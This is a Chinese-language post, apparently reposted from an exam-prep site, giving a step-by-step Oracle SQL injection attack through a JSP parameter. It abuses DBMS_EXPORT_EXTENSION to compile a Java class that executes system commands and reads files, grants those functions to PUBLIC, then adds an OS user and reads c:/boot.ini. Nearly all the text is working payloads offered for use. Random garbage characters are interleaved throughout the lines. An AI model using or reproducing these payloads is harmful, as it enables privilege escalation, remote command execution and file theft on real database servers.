Oracle辅导：oracleSQL注入命令总结

会计考友

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
5 P2 S" l9 U+ `6 G. o$ w    /xxx.jsp?id=1 and ''1''''a''||(select SYS.DBMS_EXPORT_EXTENSION.....)
7 B) a; J6 V: g1 g; I% S. B0 t    的形式即可。(用" ''a''|| "是为了让语句返回true值)
    语句有点长，可能要用post提交。
    以下是各个步骤：
    1.创建包
% O- c. t  z& I) r" Z  v& l( }    通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：
    /xxx.jsp?id=1 and ''1''''a''||(
: `/ e) t4 f4 Q    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
' ^; D& N9 I$ Y' v    create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
    new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
    }'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
& Y3 S2 O2 ?/ P; H# S0 U0 W    )
( i1 q9 z' c4 U( x/ h. h    ------------------------
    如果url有长度限制，可以把readFile()函数块去掉，即：
    /xxx.jsp?id=1 and ''1''''a''||(
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
- _; q* D( K# \* K4 U! P& P4 p8 [% V    create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
: _9 s7 J8 Z% k' x$ c2 M, s+ b) B    new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
    }'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
& f, v+ W( e: U6 A/ R# U    )
0 i7 D* U9 {% H    同时把后面步骤 linuxidc.com">www.linuxidc.com提到的 对readFile()的处理语句去掉。
# F$ H4 T8 f* t* g9 V6 D    ------------------------------
8 F) j! {' ~7 ]/ T1 W  K* y9 W    2.赋Java权限
+ [4 K1 p$ L' l/ L4 P0 q! i  d) H3 q    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''begin dbms_java.grant_permission( ''''''''''''''''PUBLIC'''''''''''''''', ''''''''''''''''SYS:java.io.FilePermission'''''''''''''''', '''''''''''''''''''''''''''''''', ''''''''''''''''execute'''''''''''''''' );end;'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    3.创建函数
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
2 a% M/ m) k  ^' B    create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''''''''''LinxUtil.runCMD(java.lang.String) return String'''''''''''''''';   '''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''
    create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''''''''''LinxUtil.readFile(java.lang.String) return String'''''''''''''''';   '''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
2 d9 z/ z: N- f    4.赋public执行函数的权限
. v4 D- ^& [6 q9 D8 n, J+ o    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''grant all on LinxRunCMD to public'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
  z- ^) w9 h/ f; z$ u  p    select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(''FOO'',''BAR'',''DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''''''grant all on LinxReadFile to public'''''''';END;'''';END;--'',''SYS'',0,''1'',0) from dual
    5.测试上面的几步是否成功
    and ''1''''11''||(
    select OBJECT_ID from all_objects where object_name =''LINXRUNCMD''
    )
    and ''1''(
    select OBJECT_ID from all_objects where object_name =''LINXREADFILE''
    )
    6.执行命令：
    /xxx.jsp?id=1 and ''1''(
    select sys.LinxRunCMD(''cmd /c net user linx /add'') from dual
! [% a/ v0 }- s: ~; x1 z    )
+ O' \# f7 [' s: ~. w' j    /xxx.jsp?id=1 and ''1''(
) e* Z: X0 _) {    select sys.LinxReadFile(''c:/boot.ini'') from dual
* C$ F1 ^. p2 D    )
    注意sys.LinxReadFile()返回的是varchar类型，不能用"and 1" 代替 "and ''1''"。